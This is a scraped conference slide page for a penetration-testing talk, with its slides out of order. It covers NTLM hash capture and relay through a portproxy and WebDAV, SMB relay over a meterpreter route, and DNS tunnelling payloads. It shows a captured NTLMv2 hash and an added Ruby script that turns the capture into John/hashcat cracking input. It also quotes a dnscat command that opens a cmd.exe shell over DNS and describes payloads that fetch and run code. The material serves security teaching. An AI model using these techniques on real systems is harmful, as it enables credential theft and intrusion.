[*] 50.50.50.50 http_ntlm - 2012-01-10 04:22:25 +0000
NTLMv2 Response Captured from WIN7X86
DOMAIN: PROJECTMENTOR USER: jadmin
LMHASH:Disabled LM_CLIENT_CHALLENGE:Disabled
NTHASH:9eed2162b1c7424780204fb9ced5bc1a
NT_CLIENT_CHALLENGE:0101000000000000067a01b4b097cd01c77c09ccedbfc55d0000000002001a00700072006f006a006500630074006d0065006e0074006f0072000000000000000000
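Added example, not from the slides or Metasploit: a Ruby decoder for the NT_CLIENT_CHALLENGE blob above, which is the NTLMv2_CLIENT_CHALLENGE structure from MS-NLMP (timestamp, client nonce, AV pairs), plus the line that turns the capture into crackable netntlmv2 input for John or hashcat. The blob is the slide's hex re-joined across its line breaks; the server challenge does not appear in the printed output, so the fixed default that Metasploit's capture modules use is assumed.

```ruby
require 'time'

# Fields as Metasploit's http_ntlm printed them on the slide.
CAPTURE = {
  user: 'jadmin',
  domain: 'PROJECTMENTOR',
  ntproofstr: '9eed2162b1c7424780204fb9ced5bc1a',
  blob: '0101000000000000067a01b4b097cd01c77c09ccedbfc55d0000000002001a00' \
        '700072006f006a006500630074006d0065006e0074006f007200' \
        '0000000000000000'
}.freeze

# Not in the slide output; assumption: the CHALLENGE default of Metasploit's
# capture modules. Use whatever your listener was configured with.
SERVER_CHALLENGE = '1122334455667788'

FILETIME_EPOCH_OFFSET = 11_644_473_600 # seconds from 1601-01-01 to 1970-01-01

AV_NAMES = { 1 => :nb_computer, 2 => :nb_domain, 3 => :dns_computer, 4 => :dns_domain,
             5 => :dns_tree, 6 => :flags, 7 => :timestamp, 9 => :target_name }.freeze
AV_UTF16 = [1, 2, 3, 4, 5, 9].freeze # string-valued AV pairs, UTF-16LE

# NTLMv2_CLIENT_CHALLENGE (MS-NLMP 2.2.2.7): RespType(1) HiRespType(1)
# Reserved(6) TimeStamp(8, FILETIME LE) ChallengeFromClient(8) Reserved(4)
# then AvPairs (AvId u16 LE, AvLen u16 LE, value) ending with AvId 0.
def parse_ntlmv2_blob(hex)
  raw = [hex].pack('H*')
  raise 'not an NTLMv2 response blob' unless raw.byteslice(0, 2) == "\x01\x01".b
  filetime = raw.byteslice(8, 8).unpack1('Q<')
  pairs = {}
  off = 28
  loop do
    av_id, av_len = raw.byteslice(off, 4)&.unpack('vv')
    break if av_id.nil? || av_id.zero?
    val = raw.byteslice(off + 4, av_len)
    pairs[AV_NAMES.fetch(av_id, av_id)] =
      AV_UTF16.include?(av_id) ? val.force_encoding('UTF-16LE').encode('UTF-8') : val.unpack1('H*')
    off += 4 + av_len
  end
  {
    time: Time.at(filetime / 10_000_000 - FILETIME_EPOCH_OFFSET).utc, # client's clock at auth time
    client_challenge: raw.byteslice(16, 8).unpack1('H*'),
    av_pairs: pairs
  }
end

# John/hashcat "netntlmv2" line: user::domain:server_challenge:ntproofstr:blob
def john_line(cap, server_challenge: SERVER_CHALLENGE)
  "#{cap[:user]}::#{cap[:domain]}:#{server_challenge}:#{cap[:ntproofstr]}:#{cap[:blob]}"
end

if $PROGRAM_NAME == __FILE__
  info = parse_ntlmv2_blob(CAPTURE[:blob])
  puts "client time #{info[:time]}  client challenge #{info[:client_challenge]}"
  info[:av_pairs].each { |k, v| puts "  #{k}: #{v}" }
  puts john_line(CAPTURE)
end
```

The AV pairs are copied by the client from the server's CHALLENGE message, so what you read back here is the target info your own listener advertised, not the victim's real domain; the DOMAIN/USER fields the module prints come from the AUTHENTICATE message and are the ones that matter.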
why
                           1. Give me SHARE3!
                           2. Portproxy!
                           3. AUTH!
                           4. AUTH! via portproxy
                           5. OK, you are in my Intranet, AUTOAUTH
                           6. AUTOAUTH!
                           7. kthxbai!

The share request that failed over SMB is retried over WebDAV to port 80 on the same
host; the portproxy on VICTIM1 hands it to the attacker’s http_ntlm listener, and
because VICTIM1 is in the client’s Intranet zone it auto-authenticates.

And yes, SMB_Relay works just fine if you have a route set up over your meterpreter
shell of the connect back. Oh, did I mention cross-protocol means you can go to the
same host?! ;-)

Respectfully refrained from any Inside->Out Google images. You’re welcome.
The setup…

Are DNS Payloads useful? Let’s talk about
          our public options
DNS Payloads
• Quick talk on currently available DNS payloads
• What’s available?
  – CANVAS DNS Mosdef
  – DNS Cat (skull security)
  – Metasploit DNS Payloads
DNS Payloads
• Canvas DNS Mosdef
  – Uses DNS TXT records
    • So it’s UDP and correctly formed?
  – BUT
    • Directly connects to the host
    • Uses TXT records
          – I’ve never pentested someone *good* that allowed this
• Canvas DNS Mosdef
DNS Payloads
• DNSCat (Skullsecurity)
  –   http://www.skullsecurity.org/wiki/index.php/Dnscat

  – Uses recursive DNS requests
        • So it’s UDP and correctly formed?
  – Has a metasploit payload, so can make a msf dnscat binary to run and get shell
  – Same as dnscat –d domain –exec “cmd.exe”
  – BUT
        • Does recursive DNS requests
        • Never worked for me IRL
DNS Payloads
• DNSCat (Skullsecurity)
DNS Payloads
• DNSCat (java version)
  –   http://tadek.pietraszek.org/projects/DNScat/


  – Comes as java libs
  – Requires PPP to tunnel anything useful
        • *nix only?
DNS Payloads
• DNSCat (java version)
DNS Payloads
• Metasploit DNS
  – Currently there are no full DNS payloads
     • Aside from the skullsecurity dnscat payload (not in trunk)
  – There are several payloads that will go fetch ANOTHER payload and exec it for you via DNS
     • dns_txt_query_exec.rb
     • dns_query_exec.rb
     • https://github.com/rapid7/metasploit-framework/pull/173
  – Something in the works:
    http://dev.metasploit.com/redmine/issues/444#note-9
DNS Payloads
• Bottom Line
  – Nothing public that’s usable ATM
Dirty Little Secrets They Didn't Teach You In Pentest Class v2

How fun of privilege escalation Red Pill2017
 
0wn-premises: Bypassing Microsoft Defender for Identity
0wn-premises: Bypassing Microsoft Defender for Identity0wn-premises: Bypassing Microsoft Defender for Identity
0wn-premises: Bypassing Microsoft Defender for Identity
 
Derbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active DirectoryDerbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active Directory
 
Carlos García - Pentesting Active Directory [rooted2018]
Carlos García - Pentesting Active Directory [rooted2018]Carlos García - Pentesting Active Directory [rooted2018]
Carlos García - Pentesting Active Directory [rooted2018]
 
Evading Microsoft ATA for Active Directory Domination
Evading Microsoft ATA for Active Directory DominationEvading Microsoft ATA for Active Directory Domination
Evading Microsoft ATA for Active Directory Domination
 
Six Degrees of Domain Admin - BloodHound at DEF CON 24
Six Degrees of Domain Admin - BloodHound at DEF CON 24Six Degrees of Domain Admin - BloodHound at DEF CON 24
Six Degrees of Domain Admin - BloodHound at DEF CON 24
 
Fantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find ThemFantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find Them
 

Similar to Dirty Little Secrets They Didn't Teach You In Pentest Class v2

hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
Chris Gates
 
Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd
Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. LtdBeyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd
Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd
Nipun Jaswal
 
Abusing bleeding edge web standards for appsec glory
Abusing bleeding edge web standards for appsec gloryAbusing bleeding edge web standards for appsec glory
Abusing bleeding edge web standards for appsec glory
Priyanka Aash
 
Externally Testing Modern AD Domains - Arcticcon
Externally Testing Modern AD Domains - ArcticconExternally Testing Modern AD Domains - Arcticcon
Externally Testing Modern AD Domains - Arcticcon
Karl Fosaaen
 
Securing Your MongoDB Deployment
Securing Your MongoDB DeploymentSecuring Your MongoDB Deployment
Securing Your MongoDB Deployment
MongoDB
 
Application and Server Security
Application and Server SecurityApplication and Server Security
Application and Server Security
Brian Pontarelli
 
DEF CON 23 - CASSIDY LEVERETT LEE - switches get stitches
DEF CON 23 - CASSIDY LEVERETT LEE - switches get stitchesDEF CON 23 - CASSIDY LEVERETT LEE - switches get stitches
DEF CON 23 - CASSIDY LEVERETT LEE - switches get stitches
Felipe Prado
 
Bsidesnova- Pentesting Methodology - Making bits less complicated
Bsidesnova- Pentesting Methodology - Making bits less complicatedBsidesnova- Pentesting Methodology - Making bits less complicated
Bsidesnova- Pentesting Methodology - Making bits less complicated
Octavio Paguaga
 
Jon McCoy - AppSec-USA-2014 Hacking C#(.NET) Applications:Defend by Design
Jon McCoy - AppSec-USA-2014 Hacking C#(.NET) Applications:Defend by DesignJon McCoy - AppSec-USA-2014 Hacking C#(.NET) Applications:Defend by Design
Jon McCoy - AppSec-USA-2014 Hacking C#(.NET) Applications:Defend by Design
jonmccoy
 
How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)
Larry Cashdollar
 
How to write secure code
How to write secure codeHow to write secure code
How to write secure code
Flaskdata.io
 
authentication.ppt
authentication.pptauthentication.ppt
authentication.ppt
AchinikeWinifred
 
Cloud Device Insecurity
Cloud Device InsecurityCloud Device Insecurity
Cloud Device Insecurity
Jeremy Brown
 
Hashitalks 2021 - How the Dynamic Duo of Vault and Puppet Tame SSL Certificates
Hashitalks 2021 - How the Dynamic Duo of Vault and Puppet Tame SSL CertificatesHashitalks 2021 - How the Dynamic Duo of Vault and Puppet Tame SSL Certificates
Hashitalks 2021 - How the Dynamic Duo of Vault and Puppet Tame SSL Certificates
Nick Maludy
 
Hacking sites for fun and profit
Hacking sites for fun and profitHacking sites for fun and profit
Hacking sites for fun and profit
David Stockton
 
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applications
Devnology
 
Infosecurity Europe 2019 - Phishing & OOB Exfiltration Through Purple Tinted ...
Infosecurity Europe 2019 - Phishing & OOB Exfiltration Through Purple Tinted ...Infosecurity Europe 2019 - Phishing & OOB Exfiltration Through Purple Tinted ...
Infosecurity Europe 2019 - Phishing & OOB Exfiltration Through Purple Tinted ...
in.security Ltd.
 
Socially Acceptable Methods to Walk in the Front Door
Socially Acceptable Methods to Walk in the Front DoorSocially Acceptable Methods to Walk in the Front Door
Socially Acceptable Methods to Walk in the Front Door
Mike Felch
 
Low Hanging Fruit, Making Your Basic MongoDB Installation More Secure
Low Hanging Fruit, Making Your Basic MongoDB Installation More SecureLow Hanging Fruit, Making Your Basic MongoDB Installation More Secure
Low Hanging Fruit, Making Your Basic MongoDB Installation More Secure
MongoDB
 

Similar to Dirty Little Secrets They Didn't Teach You In Pentest Class v2 (20)

hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
 
Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd
Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. LtdBeyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd
Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd
 
Abusing bleeding edge web standards for appsec glory
Abusing bleeding edge web standards for appsec gloryAbusing bleeding edge web standards for appsec glory
Abusing bleeding edge web standards for appsec glory
 
Externally Testing Modern AD Domains - Arcticcon
Externally Testing Modern AD Domains - ArcticconExternally Testing Modern AD Domains - Arcticcon
Externally Testing Modern AD Domains - Arcticcon
 
Securing Your MongoDB Deployment
Securing Your MongoDB DeploymentSecuring Your MongoDB Deployment
Securing Your MongoDB Deployment
 
Application and Server Security
Application and Server SecurityApplication and Server Security
Application and Server Security
 
DEF CON 23 - CASSIDY LEVERETT LEE - switches get stitches
DEF CON 23 - CASSIDY LEVERETT LEE - switches get stitchesDEF CON 23 - CASSIDY LEVERETT LEE - switches get stitches
DEF CON 23 - CASSIDY LEVERETT LEE - switches get stitches
 
Bsidesnova- Pentesting Methodology - Making bits less complicated
Bsidesnova- Pentesting Methodology - Making bits less complicatedBsidesnova- Pentesting Methodology - Making bits less complicated
Bsidesnova- Pentesting Methodology - Making bits less complicated
 
Jon McCoy - AppSec-USA-2014 Hacking C#(.NET) Applications:Defend by Design
Jon McCoy - AppSec-USA-2014 Hacking C#(.NET) Applications:Defend by DesignJon McCoy - AppSec-USA-2014 Hacking C#(.NET) Applications:Defend by Design
Jon McCoy - AppSec-USA-2014 Hacking C#(.NET) Applications:Defend by Design
 
How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)
 
How to write secure code
How to write secure codeHow to write secure code
How to write secure code
 
authentication.ppt
authentication.pptauthentication.ppt
authentication.ppt
 
Cloud Device Insecurity
Cloud Device InsecurityCloud Device Insecurity
Cloud Device Insecurity
 
Hashitalks 2021 - How the Dynamic Duo of Vault and Puppet Tame SSL Certificates
Hashitalks 2021 - How the Dynamic Duo of Vault and Puppet Tame SSL CertificatesHashitalks 2021 - How the Dynamic Duo of Vault and Puppet Tame SSL Certificates
Hashitalks 2021 - How the Dynamic Duo of Vault and Puppet Tame SSL Certificates
 
Hacking sites for fun and profit
Hacking sites for fun and profitHacking sites for fun and profit
Hacking sites for fun and profit
 
Starwest 2008
Starwest 2008Starwest 2008
Starwest 2008
 
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applications
 
Infosecurity Europe 2019 - Phishing & OOB Exfiltration Through Purple Tinted ...
Infosecurity Europe 2019 - Phishing & OOB Exfiltration Through Purple Tinted ...Infosecurity Europe 2019 - Phishing & OOB Exfiltration Through Purple Tinted ...
Infosecurity Europe 2019 - Phishing & OOB Exfiltration Through Purple Tinted ...
 
Socially Acceptable Methods to Walk in the Front Door
Socially Acceptable Methods to Walk in the Front DoorSocially Acceptable Methods to Walk in the Front Door
Socially Acceptable Methods to Walk in the Front Door
 
Low Hanging Fruit, Making Your Basic MongoDB Installation More Secure
Low Hanging Fruit, Making Your Basic MongoDB Installation More SecureLow Hanging Fruit, Making Your Basic MongoDB Installation More Secure
Low Hanging Fruit, Making Your Basic MongoDB Installation More Secure
 

More from Rob Fuller

Why isn't infosec working? Did you turn it off and back on again?
Why isn't infosec working? Did you turn it off and back on again?Why isn't infosec working? Did you turn it off and back on again?
Why isn't infosec working? Did you turn it off and back on again?
Rob Fuller
 
KiwiCon 2016 - Kicking Orion's Assets
KiwiCon 2016 - Kicking Orion's AssetsKiwiCon 2016 - Kicking Orion's Assets
KiwiCon 2016 - Kicking Orion's Assets
Rob Fuller
 
Writing malware while the blue team is staring at you
Writing malware while the blue team is staring at youWriting malware while the blue team is staring at you
Writing malware while the blue team is staring at you
Rob Fuller
 
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)Rob Fuller
 
Attacker Ghost Stories - ShmooCon 2014
Attacker Ghost Stories - ShmooCon 2014Attacker Ghost Stories - ShmooCon 2014
Attacker Ghost Stories - ShmooCon 2014
Rob Fuller
 
NotaCon 2011 - Networking for Pentesters
NotaCon 2011 - Networking for PentestersNotaCon 2011 - Networking for Pentesters
NotaCon 2011 - Networking for PentestersRob Fuller
 
As The Phish Turns
As The Phish TurnsAs The Phish Turns
As The Phish TurnsRob Fuller
 
RIT 2009 Intellectual Pwnership
RIT 2009 Intellectual PwnershipRIT 2009 Intellectual Pwnership
RIT 2009 Intellectual PwnershipRob Fuller
 
Metasploit magic the dark coners of the framework
Metasploit magic   the dark coners of the frameworkMetasploit magic   the dark coners of the framework
Metasploit magic the dark coners of the frameworkRob Fuller
 
Windows Attacks AT is the new black
Windows Attacks   AT is the new blackWindows Attacks   AT is the new black
Windows Attacks AT is the new black
Rob Fuller
 
Practical Exploitation - Webappy Style
Practical Exploitation - Webappy StylePractical Exploitation - Webappy Style
Practical Exploitation - Webappy Style
Rob Fuller
 
Intro to White Chapel
Intro to White ChapelIntro to White Chapel
Intro to White Chapel
Rob Fuller
 
A @textfiles approach to gathering the world's DNS
A @textfiles approach to gathering the world's DNSA @textfiles approach to gathering the world's DNS
A @textfiles approach to gathering the world's DNS
Rob Fuller
 
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting ClassThe Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
Rob Fuller
 
Memory Forensics for Pentesters: Firefox
Memory Forensics for Pentesters: FirefoxMemory Forensics for Pentesters: Firefox
Memory Forensics for Pentesters: Firefox
Rob Fuller
 
From Couch To Career In 80 Hours
From Couch To Career In 80 HoursFrom Couch To Career In 80 Hours
From Couch To Career In 80 Hours
Rob Fuller
 

More from Rob Fuller (17)

Why isn't infosec working? Did you turn it off and back on again?
Why isn't infosec working? Did you turn it off and back on again?Why isn't infosec working? Did you turn it off and back on again?
Why isn't infosec working? Did you turn it off and back on again?
 
KiwiCon 2016 - Kicking Orion's Assets
KiwiCon 2016 - Kicking Orion's AssetsKiwiCon 2016 - Kicking Orion's Assets
KiwiCon 2016 - Kicking Orion's Assets
 
Writing malware while the blue team is staring at you
Writing malware while the blue team is staring at youWriting malware while the blue team is staring at you
Writing malware while the blue team is staring at you
 
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)
 
Attacker Ghost Stories - ShmooCon 2014
Attacker Ghost Stories - ShmooCon 2014Attacker Ghost Stories - ShmooCon 2014
Attacker Ghost Stories - ShmooCon 2014
 
GiTFO
GiTFOGiTFO
GiTFO
 
NotaCon 2011 - Networking for Pentesters
NotaCon 2011 - Networking for PentestersNotaCon 2011 - Networking for Pentesters
NotaCon 2011 - Networking for Pentesters
 
As The Phish Turns
As The Phish TurnsAs The Phish Turns
As The Phish Turns
 
RIT 2009 Intellectual Pwnership
RIT 2009 Intellectual PwnershipRIT 2009 Intellectual Pwnership
RIT 2009 Intellectual Pwnership
 
Metasploit magic the dark coners of the framework
Metasploit magic   the dark coners of the frameworkMetasploit magic   the dark coners of the framework
Metasploit magic the dark coners of the framework
 
Windows Attacks AT is the new black
Windows Attacks   AT is the new blackWindows Attacks   AT is the new black
Windows Attacks AT is the new black
 
Practical Exploitation - Webappy Style
Practical Exploitation - Webappy StylePractical Exploitation - Webappy Style
Practical Exploitation - Webappy Style
 
Intro to White Chapel
Intro to White ChapelIntro to White Chapel
Intro to White Chapel
 
A @textfiles approach to gathering the world's DNS
A @textfiles approach to gathering the world's DNSA @textfiles approach to gathering the world's DNS
A @textfiles approach to gathering the world's DNS
 
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting ClassThe Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
 
Memory Forensics for Pentesters: Firefox
Memory Forensics for Pentesters: FirefoxMemory Forensics for Pentesters: Firefox
Memory Forensics for Pentesters: Firefox
 
From Couch To Career In 80 Hours
From Couch To Career In 80 HoursFrom Couch To Career In 80 Hours
From Couch To Career In 80 Hours
 

Recently uploaded

FIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdfFIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance
 
Transcript: Selling digital books in 2024: Insights from industry leaders - T...
Transcript: Selling digital books in 2024: Insights from industry leaders - T...Transcript: Selling digital books in 2024: Insights from industry leaders - T...
Transcript: Selling digital books in 2024: Insights from industry leaders - T...
BookNet Canada
 
Knowledge engineering: from people to machines and back
Knowledge engineering: from people to machines and backKnowledge engineering: from people to machines and back
Knowledge engineering: from people to machines and back
Elena Simperl
 
Key Trends Shaping the Future of Infrastructure.pdf
Key Trends Shaping the Future of Infrastructure.pdfKey Trends Shaping the Future of Infrastructure.pdf
Key Trends Shaping the Future of Infrastructure.pdf
Cheryl Hung
 
Search and Society: Reimagining Information Access for Radical Futures
Search and Society: Reimagining Information Access for Radical FuturesSearch and Society: Reimagining Information Access for Radical Futures
Search and Society: Reimagining Information Access for Radical Futures
Bhaskar Mitra
 
Assuring Contact Center Experiences for Your Customers With ThousandEyes
Assuring Contact Center Experiences for Your Customers With ThousandEyesAssuring Contact Center Experiences for Your Customers With ThousandEyes
Assuring Contact Center Experiences for Your Customers With ThousandEyes
ThousandEyes
 
State of ICS and IoT Cyber Threat Landscape Report 2024 preview
State of ICS and IoT Cyber Threat Landscape Report 2024 previewState of ICS and IoT Cyber Threat Landscape Report 2024 preview
State of ICS and IoT Cyber Threat Landscape Report 2024 preview
Prayukth K V
 
Bits & Pixels using AI for Good.........
Bits & Pixels using AI for Good.........Bits & Pixels using AI for Good.........
Bits & Pixels using AI for Good.........
Alison B. Lowndes
 
ODC, Data Fabric and Architecture User Group
ODC, Data Fabric and Architecture User GroupODC, Data Fabric and Architecture User Group
ODC, Data Fabric and Architecture User Group
CatarinaPereira64715
 
UiPath Test Automation using UiPath Test Suite series, part 3
UiPath Test Automation using UiPath Test Suite series, part 3UiPath Test Automation using UiPath Test Suite series, part 3
UiPath Test Automation using UiPath Test Suite series, part 3
DianaGray10
 
GraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge GraphGraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge Graph
Guy Korland
 
From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...
From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...
From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...
Product School
 
When stars align: studies in data quality, knowledge graphs, and machine lear...
When stars align: studies in data quality, knowledge graphs, and machine lear...When stars align: studies in data quality, knowledge graphs, and machine lear...
When stars align: studies in data quality, knowledge graphs, and machine lear...
Elena Simperl
 
To Graph or Not to Graph Knowledge Graph Architectures and LLMs
To Graph or Not to Graph Knowledge Graph Architectures and LLMsTo Graph or Not to Graph Knowledge Graph Architectures and LLMs
To Graph or Not to Graph Knowledge Graph Architectures and LLMs
Paul Groth
 
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
UiPathCommunity
 
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...
Ramesh Iyer
 
PHP Frameworks: I want to break free (IPC Berlin 2024)
PHP Frameworks: I want to break free (IPC Berlin 2024)PHP Frameworks: I want to break free (IPC Berlin 2024)
PHP Frameworks: I want to break free (IPC Berlin 2024)
Ralf Eggert
 
The Future of Platform Engineering
The Future of Platform EngineeringThe Future of Platform Engineering
The Future of Platform Engineering
Jemma Hussein Allen
 
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
James Anderson
 
How world-class product teams are winning in the AI era by CEO and Founder, P...
How world-class product teams are winning in the AI era by CEO and Founder, P...How world-class product teams are winning in the AI era by CEO and Founder, P...
How world-class product teams are winning in the AI era by CEO and Founder, P...
Product School
 

Recently uploaded (20)

FIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdfFIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdf
 
Transcript: Selling digital books in 2024: Insights from industry leaders - T...
Transcript: Selling digital books in 2024: Insights from industry leaders - T...Transcript: Selling digital books in 2024: Insights from industry leaders - T...
Transcript: Selling digital books in 2024: Insights from industry leaders - T...
 
Knowledge engineering: from people to machines and back
Knowledge engineering: from people to machines and backKnowledge engineering: from people to machines and back
Knowledge engineering: from people to machines and back
 
Key Trends Shaping the Future of Infrastructure.pdf
Key Trends Shaping the Future of Infrastructure.pdfKey Trends Shaping the Future of Infrastructure.pdf
Key Trends Shaping the Future of Infrastructure.pdf
 
Search and Society: Reimagining Information Access for Radical Futures
Search and Society: Reimagining Information Access for Radical FuturesSearch and Society: Reimagining Information Access for Radical Futures
Search and Society: Reimagining Information Access for Radical Futures
 
Assuring Contact Center Experiences for Your Customers With ThousandEyes
Assuring Contact Center Experiences for Your Customers With ThousandEyesAssuring Contact Center Experiences for Your Customers With ThousandEyes
Assuring Contact Center Experiences for Your Customers With ThousandEyes
 
State of ICS and IoT Cyber Threat Landscape Report 2024 preview
State of ICS and IoT Cyber Threat Landscape Report 2024 previewState of ICS and IoT Cyber Threat Landscape Report 2024 preview
State of ICS and IoT Cyber Threat Landscape Report 2024 preview
 
Bits & Pixels using AI for Good.........
Bits & Pixels using AI for Good.........Bits & Pixels using AI for Good.........
Bits & Pixels using AI for Good.........
 
ODC, Data Fabric and Architecture User Group
ODC, Data Fabric and Architecture User GroupODC, Data Fabric and Architecture User Group
ODC, Data Fabric and Architecture User Group
 
UiPath Test Automation using UiPath Test Suite series, part 3
UiPath Test Automation using UiPath Test Suite series, part 3UiPath Test Automation using UiPath Test Suite series, part 3
UiPath Test Automation using UiPath Test Suite series, part 3
 
GraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge GraphGraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge Graph
 
From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...
From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...
From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...
 
When stars align: studies in data quality, knowledge graphs, and machine lear...
When stars align: studies in data quality, knowledge graphs, and machine lear...When stars align: studies in data quality, knowledge graphs, and machine lear...
When stars align: studies in data quality, knowledge graphs, and machine lear...
 
To Graph or Not to Graph Knowledge Graph Architectures and LLMs
To Graph or Not to Graph Knowledge Graph Architectures and LLMsTo Graph or Not to Graph Knowledge Graph Architectures and LLMs
To Graph or Not to Graph Knowledge Graph Architectures and LLMs
 
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
 
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...
 
PHP Frameworks: I want to break free (IPC Berlin 2024)
PHP Frameworks: I want to break free (IPC Berlin 2024)PHP Frameworks: I want to break free (IPC Berlin 2024)
PHP Frameworks: I want to break free (IPC Berlin 2024)
 
The Future of Platform Engineering
The Future of Platform EngineeringThe Future of Platform Engineering
The Future of Platform Engineering
 
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
 
How world-class product teams are winning in the AI era by CEO and Founder, P...
How world-class product teams are winning in the AI era by CEO and Founder, P...How world-class product teams are winning in the AI era by CEO and Founder, P...
How world-class product teams are winning in the AI era by CEO and Founder, P...
 

Dirty Little Secrets They Didn't Teach You In Pentest Class v2

2. Whoami
• Rob Fuller (mubix)
  – Twitter -> mubix
  – Blog -> http://www.room362.com
  – NoVA Hackers
• Previous Talks
  – Dirty Little Secrets
  – Networking for Penetration Testers
  – Metasploit Framework/Pro Training for Rapid7
  – Deep Magic 101
  – Couch to Career in 80 hours

3. Whoami
• Chris Gates (CG)
  – Twitter carnal0wnage
  – Blog carnal0wnage.attackresearch.com
  – Job Partner/Principal Security Consultant at Lares
  – NoVAHackers
• Previous Talks
  – ColdFusion for Pentesters
  – From LOW to PWNED
  – Dirty Little Secrets
  – Attacking Oracle (via web)
  – wXf Web eXploitation Framework
  – Open Source Information Gathering
  – Attacking Oracle (via TNS)
  – Client-Side Attacks

4. Infoz
• No philosophical stuff this time
  – Just digging in and showing neat shit we’ve been doing since last year
  – Last year’s stuff still applies although was told we were “preaching to the choir”…who still doesn’t do it…maybe on Sundays…
  – Anyway…

5. Agenda
